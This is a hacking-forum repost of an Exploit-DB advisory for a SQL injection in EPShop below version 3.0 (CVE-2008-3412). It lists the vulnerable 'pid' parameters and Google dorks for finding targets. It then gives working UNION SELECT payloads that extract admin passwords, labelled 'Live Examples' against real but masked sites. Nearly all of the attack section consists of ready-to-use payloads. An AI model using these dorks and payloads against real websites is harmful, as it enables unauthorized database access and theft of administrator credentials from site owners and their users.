Exploit EPShop < 3.0 - 'pid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6139
Проверка EDB
  1. Пройдено
Автор
MIKEX
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-3412
Дата публикации
2008-07-26
Код:
########################################################################################
#
# [+]  Name   : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability
# [+]  Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com
# [+]  Dork(s): ?action=pro_show and ?action=disppro
# [+]  Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo
#
########################################################################################


Information;

    You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop
    They stopped supporting the old version a while ago.

Exploit;

    SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection]
    SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection]

Live Examples;

    http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
    http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--

# milw0rm.com [2008-07-26]
 
Источник
www.exploit-db.com

Похожие темы